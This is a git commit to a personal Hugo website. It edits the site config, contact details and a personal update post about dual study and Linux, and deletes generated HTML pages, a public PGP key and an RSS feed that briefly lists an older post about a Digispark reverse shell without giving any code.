Updated git and website

master
_N0x 1 year ago
parent b0c50c1750
commit 9951798745

5
.gitignore vendored

@ -0,0 +1,5 @@
!public
public/*
!public/images
*.lock

@ -18,7 +18,7 @@ favicon = "images/favicon.png"
[params]
author = "_N0x"
description = "Just some small blog"
description = "Just some small website"
keywords = "blog,developer,personal"
info = "» Here be dragons «"
avatarurl = "images/spoopy.gif"
@ -55,7 +55,7 @@ favicon = "images/favicon.png"
name = "Twitter"
icon = "fa fa-twitter fa-2x"
weight = 3
url = "https://twitter.com/n0x_io"
url = "https://twitter.com/_n0tn0x"
[[menu.main]]
name = "Blog"
@ -73,7 +73,15 @@ favicon = "images/favicon.png"
name = "Git"
weight = 4
url = "https://git.n0x.io/"
#[[menu.main]]
# name = "PrivateBin"
# weight = 5
# url = "https://pb.n0x.io/"
[[menu.main]]
name = "PrivatBin"
weight = 5
url = "https://pb.n0x.io/"
name = "FreshRSS"
weight = 6
url = "https://frss.n0x.io/"
#[[menu.main]]
# name = "BitWarden"
# weight = 7
# url = "https://bw.n0x.io/"

@ -4,8 +4,8 @@ slug = "about"
+++
## Contact me
* E-Mail: tf[@]n0x.io [pgp](https://n0x.io/about/pgp)
* Twitter: [@n0x_io](https://twitter.com/n0x_io)
* E-Mail: tf[@]n0x.io
* Twitter: [@_n0tn0x](https://twitter.com/_n0tn0x)
* GitLab: [n0x_io](https://gitlab.com/n0x_io)

@ -1,5 +1,5 @@
+++
name = "_N0x"
twitter = "@n0x_io"
#twitter = "@n0x_io"
+++
_N0x is just a dude way to interested in anything computer related. Be it hardware, software, programming or even gaming.

@ -1,6 +1,6 @@
+++
draft = false
date = 2021-05-26T11:14:07+02:00
date = 2021-05-26T11:15:07+02:00
title = "Hello World! Again!"
description = ""
slug = ""
@ -17,19 +17,31 @@ Hey there! Its me again.
It has been some time since I wrote a new article in here so I thought Id state an update on me. In my [first post]({{< ref "HelloWorld.md" >}} "first post") I talked a little about me. By now some time went by and some things have changed - not that I wrote much about me to begin with.
### From full time job to becoming a student
I'm now 23 years old and have just started my 4th semester at university, having decided that I wanted to study something related to computer science. After finishing my apprenticeship in 2018, I worked as a software developer for just over a year. In August 2019 I started my dual study in Software Technology (B.Sc.). A dual study is a study model here in Germany that allows you to go to university full-time during the semester, but you are still employed and paid by a company. There is no real break between semesters as you work full-time for your partner company. The idea is to get as much practical experience as possible during your studies. During these periods or work placements - which could be translated as 'practical periods' - you will work on a project in your company for which you will need to produce documentation. This documentation will in turn be evaluated by the university and credit points will be awarded accordingly. Oh, and all classes are compulsory and you can only choose some of them. Classes at the university are quite small, with a maximum of 25 people. This means that the whole university experience is more like going to school here in Germany - for better or worse. But it does mean that you actually have a face at the university and that networking between students and professors and other lecturers is quite easy.
<!--
Im now 23 years old and just started my 4th semester at university after deciding that I wanted to study something computer science related. After finishing my apprenticeship in 2018 I worked as a software developer for little over a year. In August 2019 I started my dual study in Software Technology (B.Sc.). A dual study is a studying model here in Germany that lets you go to university full time during the semester, but you are still hired and paid by a company. Between semesters you have no real semester break as you go to work full time at your partnering company. This is to collect as much real-life experience as possible during the study. During these phases or working - could translate as “practical phases” - you work on a project at your company for what you need to write a documentation. This documentation in return will be evaluated by the University and credit points awarded accordingly. Oh and all classes are mandatory and you can only choose some of them. The classes at university are quite small with about 25 people max. This means the whole feeling of university is more closely to that of going to school here in Germany - for better or worse. But it means you actually have a face in university and that networking between students and professors and other lecturers is quite easy.
-->
As you can see, the whole dual study thing is a very interwoven web between theory - in the form of what you think at university - and practice - in the form of a company you work for. I think it's a great concept, even if it means that you don't have the "luxury life" of a normal university student. Free time is rare, but well worth the effort, and I can only recommend this model to anyone who wants to educate themselves while getting some hands-on experience!
<!--
As you can see the whole dual study thing is a very interwoven mesh between theory - in form of what is thought at University - and practice - in form of a company you work for. I think the concept is quite neat even if it means you dont have the “luxurious life” or a regular university student. Free time is rare but well worth the effort and I can only recommend this model to anyone who wants to educate themselves while getting some hands-on-experiance!
-->
### Linux - bane of my existence
Ah, Linux. My love. My hated enemy. I feel that many people's relationship with Linux is one of love-hate. There are times when I spend hours digging through config files, compiling, modifying and tinkering just to make the smallest, tiniest change. But damn does it feel good when you get control of things and understand how things work and interact with each other. Really rewarding and so much to learn!
In early 2021, I decided to finally cut my ties with Windoot and go all Linux. I had been running Linux on my servers and laptop for some time and had been playing around with all the fun Linux stuff. My current configuration is based on DWM and Arch Linux and I'm enjoying it very much. I also switched my desktop to Linux after realising that I was hardly playing any games on it. To my surprise, it went quite well and I haven't felt the need to go back to Windows since. I still use it at work, but there's not much I can do about it. Gaming works pretty well on Linux and I can even get games like Battle Field 4 to run - with anticheat! I don't think it's something I'd recommend to a heavy gamer, but for simple browsing and such, Linux seems to come along nicely - and for professionals in the field of computer science even more so ;)
<!--
Ah Linux. My love. My hated enemy. I feel like the relationship with a lot of people towards Linux is a sort of love-hate-relationship. There are times where I spend hours digging through config files, compiling, changing and tinkering just to get the smallest, tiniest change done. But damn does it feel good once you take control of things and understand how things work and interact with each other. Truly rewarding and so many things to learn!
In the beginning of 2021 I decided to finally cut my ties with windoot and fully switch to Linux. I had been running Linux on my servers and laptop for some time now and had played around with all the fun Linux things. My current config is build on DWM and Arch Linux and Ive been enjoying it greatly. I switched to Linux on my desktop system as well after noticing that I barely played any games on it anymore. And to my surprise that went fairly well and I havent felt the need to go back to Windows ever since. Im still using it at work but not much I can do about that. Gaming works fairly well on Linux and I even got games like Battle Field 4 to run - with anticheat! I dont think its something I can recommend to a heavy gamer but for simple browsing and such Linux seems to come along nicely - and for professionals around the computer science field even more ;)
-->
### Wörk wörk wörk
Combining the two above is where I currently work. I've developed quite an interest in tinkering with Linux, and this translates surprisingly well into my day-to-day work - when I'm not at university, of course. I'm now responsible for creating and maintaining the firmware for the popular embedded systems Linux Yocto. I'm also involved in some security aspects of development at work, but I won't go into that here. The symbiosis between my hobbies and my work is fascinating. Basically, I can use the skills I have learnt at home in the workplace and, in turn, learn new things there that I can use at home. A vicious circle, if you will. And that's why I really love my job and the work I do, even though I'm just a student.
And while I'm rambling on, I have to say that it's a bit sad to see how many people are not happy in their jobs or the work they do. I can only advise every single person out there to try and find a job that they like. It's such a valuable thing in life - or maybe that's just my inner German coming through. But, oh well.
<!--
Combining both of the above topics is my current place of work. Ive developed quite the interest in tinkering with Linux and tweaking it and it translates surprisingly well to my daily work - if Im not at university of course. Im now responsible for creating and maintaining firmware build on the popular embedded systems Linux Yocto. Im also tasked with some security aspects regarding development at work buuuut of course Im not spilling anything of that on here. The symbiosis of my hobbies and my work is fascinating. I can basically deploy the skills I learned athome at my workplace and in return learn new stuff there to use at home. A non-vicious vicious circle if you want. And that makes me really love my workplace and the work I do even if Im just a student.
And while Im rambling on here I have to say that its a little sad to see how many people are not happy at their workplace or the work they do. I can only recommend to every single person out there to go and try to find a job they like. Its such a valuable thing to have in life - or maybe thats just my inner German coming through. But oh well.
-->
So much for a little update…

@ -1,181 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="Just some small blog">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="404 Page not found"/>
<meta name="twitter:description" content="Just some small blog"/>
<meta property="og:title" content="404 Page not found" />
<meta property="og:description" content="Just some small blog" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://n0x.io/404.html" />
<title>n0x.io</title>
<link rel="canonical" href="https://n0x.io/404.html">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://pb.n0x.io/">PrivatBin</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container centered">
<div class="error">
<h1>404</h1>
<h2>Page Not Found</h2>
<p>Sorry, this page does not exist.<br />You can head back to <a href="https://n0x.io">homepage</a>.</p>
</div>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,231 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="Contact me E-Mail: tf[@]n0x.io pgp Twitter: @n0x_io GitLab: n0x_io Build with Hugo This Website is generated with Hugo using the Coder Theme
License Unless noted otherwise all content on this website is protected under Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)
This means you are free to share and adapt the content under the following terms:
Share — copy and redistribute the material in any medium or format Adapt — remix, transform, and build upon the material for any purpose, even commercially.">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="About n0x.io"/>
<meta name="twitter:description" content="Contact me E-Mail: tf[@]n0x.io pgp Twitter: @n0x_io GitLab: n0x_io Build with Hugo This Website is generated with Hugo using the Coder Theme
License Unless noted otherwise all content on this website is protected under Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)
This means you are free to share and adapt the content under the following terms:
Share — copy and redistribute the material in any medium or format Adapt — remix, transform, and build upon the material for any purpose, even commercially."/>
<meta property="og:title" content="About n0x.io" />
<meta property="og:description" content="Contact me E-Mail: tf[@]n0x.io pgp Twitter: @n0x_io GitLab: n0x_io Build with Hugo This Website is generated with Hugo using the Coder Theme
License Unless noted otherwise all content on this website is protected under Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)
This means you are free to share and adapt the content under the following terms:
Share — copy and redistribute the material in any medium or format Adapt — remix, transform, and build upon the material for any purpose, even commercially." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://n0x.io/about/" /><meta property="article:section" content="" />
<title>
About n0x.io · n0x.io
</title>
<link rel="canonical" href="https://n0x.io/about/">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://pb.n0x.io/">PrivatBin</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container page">
<article>
<header>
<h1 class="title">
<a class="title-link" href="https://n0x.io/about/">
About n0x.io
</a>
</h1>
</header>
<h2 id="contact-me">
Contact me
<a class="heading-link" href="#contact-me">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h2>
<ul>
<li>E-Mail: tf[@]n0x.io <a href="https://n0x.io/about/pgp">pgp</a></li>
<li>Twitter: <a href="https://twitter.com/n0x_io">@n0x_io</a></li>
<li>GitLab: <a href="https://gitlab.com/n0x_io">n0x_io</a></li>
</ul>
<h2 id="build-with-hugo">
Build with Hugo
<a class="heading-link" href="#build-with-hugo">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h2>
<p>This Website is generated with <a href="https://gohugo.io/">Hugo</a> using the <a href="https://github.com/luizdepra/hugo-coder">Coder Theme</a></p>
<h2 id="license">
License
<a class="heading-link" href="#license">
<i class="fa fa-link" aria-hidden="true"></i>
</a>
</h2>
<p>Unless noted otherwise all content on this website is protected under <a href="https://creativecommons.org/licenses/by-sa/4.0/">Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)</a></p>
<p>This means you are free to share and adapt the content under the following terms:</p>
<ul>
<li>Share — copy and redistribute the material in any medium or format</li>
<li>Adapt — remix, transform, and build upon the material for any purpose, even commercially.</li>
</ul>
</article>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,41 +0,0 @@
-----BEGIN PGP PUBLIC KEY BLOCK-----
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
CR6bT3I=
=0vL+
-----END PGP PUBLIC KEY BLOCK-----

@ -1,212 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="_N0x is just a dude way to interested in anything computer related. Be it hardware, software, programming or even gaming.">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content=""/>
<meta name="twitter:description" content="Just some small blog"/>
<meta property="og:title" content="" />
<meta property="og:description" content="Just some small blog" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://n0x.io/authors/_n0x/" />
<title>Author: · n0x.io</title>
<link rel="canonical" href="https://n0x.io/authors/_n0x/">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="alternate" type="application/rss+xml" href="https://n0x.io/authors/_n0x/index.xml" title="n0x.io" />
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/posts/">Blog</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://cloud.n0x.io/">Cloud</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://git.n0x.io/">Git</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://pb.n0x.io/">PrivatBin</a>
</li>
<li class="navigation-item">
<a class="navigation-link" href="https://n0x.io/about/">About</a>
</li>
</ul>
</section>
</nav>
<div class="content">
<section class="container list">
<h1 class="title">
<a class="title-link" href="https://n0x.io/authors/_n0x/">Author: </a>
</h1>
<p>_N0x is just a dude way to interested in anything computer related. Be it hardware, software, programming or even gaming.</p>
<ul>
<li>
<span class="date">May 26, 2021</span>
<a class="title" href="https://n0x.io/posts/helloworldagain/">Hello World! Again!</a>
</li>
<li>
<span class="date">July 2, 2020</span>
<a class="title" href="https://n0x.io/posts/gitbucket/">Git in minutes</a>
</li>
<li>
<span class="date">January 20, 2018</span>
<a class="title" href="https://n0x.io/posts/digispark_reverseshell/">Digispark Reverse-Shell</a>
</li>
<li>
<span class="date">January 8, 2018</span>
<a class="title" href="https://n0x.io/posts/helloworld/">HelloWorld</a>
</li>
</ul>
</section>
</div>
<footer class="footer">
<section class="container">
©
2018 -
2021
_N0x
·
Powered by <a href="https://gohugo.io/">Hugo</a> & <a href="https://github.com/luizdepra/hugo-coder/">Coder</a>.
</section>
</footer>
</main>
<script src="https://n0x.io/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
</body>
</html>

@ -1,52 +0,0 @@
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>n0x.io</title>
<link>https://n0x.io/authors/_n0x/</link>
<description>Recent content on n0x.io</description>
<generator>Hugo -- gohugo.io</generator>
<language>de</language>
<lastBuildDate>Wed, 26 May 2021 11:14:07 +0200</lastBuildDate><atom:link href="https://n0x.io/authors/_n0x/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>Hello World! Again!</title>
<link>https://n0x.io/posts/helloworldagain/</link>
<pubDate>Wed, 26 May 2021 11:14:07 +0200</pubDate>
<guid>https://n0x.io/posts/helloworldagain/</guid>
<description>Hello World! Again! Hey there! Its me again.
It has been some time since I wrote a new article in here so I thought Id state an update on me. In my first post I talked a little about me. By now some time went by and some things have changed - not that I wrote much about me to begin with.
From full time job to becoming a student Im now 23 years old and just started my 4th semester at university after deciding that I wanted to study something computer science related.</description>
</item>
<item>
<title>Git in minutes</title>
<link>https://n0x.io/posts/gitbucket/</link>
<pubDate>Thu, 02 Jul 2020 00:00:00 +0200</pubDate>
<guid>https://n0x.io/posts/gitbucket/</guid>
<description>A Git-Server Setup In Minutes Sometimes I wish I had other hobbies then just trying out new stuff I discovered online.
For Some strange reason I felt the need to set up my own git server - because who doesn&amp;rsquo;t need an own server for the two or three projects you keep on github? I looked around and searched for some solutions that would fit my needs.</description>
</item>
<item>
<title>Digispark Reverse-Shell</title>
<link>https://n0x.io/posts/digispark_reverseshell/</link>
<pubDate>Sat, 20 Jan 2018 17:03:46 +0100</pubDate>
<guid>https://n0x.io/posts/digispark_reverseshell/</guid>
<description>Reverse Shell for 1,50€ - Digispark instead of USB Rubber Ducky Some of you might already have heard of it: The USB Rubber Ducky by Hak5. A very special USB-Device: Not only a mass storage device but any usb input-device you want it to be. Because of this you can use it for some very nice ways to get your payload onto a victims PC. The Rubber Ducky is freely programmable so there are no limits on what you can do with it.</description>
</item>
<item>
<title>HelloWorld</title>
<link>https://n0x.io/posts/helloworld/</link>
<pubDate>Mon, 08 Jan 2018 20:35:40 +0100</pubDate>
<guid>https://n0x.io/posts/helloworld/</guid>
<description>Hello World! Hello there and welcome on n0x.io!
I&amp;rsquo;m _N0x. I&amp;rsquo;m 20 years old and &amp;ldquo;Fachinformatiker für Anwendungsentwicklung&amp;rdquo;. I live in germany and Love tinkering with PCs and Software.
Thanks for stopping by ;)</description>
</item>
</channel>
</rss>

@ -1 +0,0 @@
<!DOCTYPE html><html><head><title>https://n0x.io/authors/_n0x/</title><link rel="canonical" href="https://n0x.io/authors/_n0x/"/><meta name="robots" content="noindex"><meta charset="utf-8" /><meta http-equiv="refresh" content="0; url=https://n0x.io/authors/_n0x/" /></head></html>

@ -1,196 +0,0 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Language" content="en">
<meta name="color-scheme" content="light dark">
<meta name="author" content="_N0x">
<meta name="description" content="Just some small blog">
<meta name="keywords" content="blog,developer,personal">
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Authors"/>
<meta name="twitter:description" content="Just some small blog"/>
<meta property="og:title" content="Authors" />
<meta property="og:description" content="Just some small blog" />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://n0x.io/authors/" />
<title>Authors · n0x.io</title>
<link rel="canonical" href="https://n0x.io/authors/">
<link rel="preload" href="https://n0x.io/fonts/forkawesome-webfont.woff2?v=1.2.0" as="font" type="font/woff2" crossorigin>
<link rel="stylesheet" href="https://n0x.io/css/coder.min.93c41bf1e522f85ecda7355985f09000f71fc1d64dda9f74051b0fa06210e93f.css" integrity="sha256-k8Qb8eUi&#43;F7NpzVZhfCQAPcfwdZN2p90BRsPoGIQ6T8=" crossorigin="anonymous" media="screen" />
<link rel="stylesheet" href="https://n0x.io/css/coder-dark.min.f37febc669ce189201c1918fac1948a254686c8d366a312c2d72b2bb71ad97d1.css" integrity="sha256-83/rxmnOGJIBwZGPrBlIolRobI02ajEsLXKyu3Gtl9E=" crossorigin="anonymous" media="screen" />
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="https://n0x.io/images/favicon-16x16.png" sizes="16x16">
<link rel="apple-touch-icon" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://n0x.io/images/apple-touch-icon.png">
<link rel="alternate" type="application/rss+xml" href="https://n0x.io/authors/index.xml" title="n0x.io" />
<meta name="generator" content="Hugo 0.83.1" />
</head>
<body class="preload-transitions colorscheme-dark"
onload=""
>
<div class="float-container">
<a id="dark-mode-toggle" class="colorscheme-toggle">
<i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
</a>
</div>
<main class="wrapper">
<nav class="navigation">
<section class="container">
<a class="navigation-title" href="https://n0x.io/">
n0x.io
</a>
<input type="checkbox" id="menu-toggle" />
<label class="menu-button float-right" for="menu-toggle">
<i class="fa fa-bars fa-fw" aria-hidden="true"></i>
</label>
<ul class="navigation-list">
<li class="navigation-item">
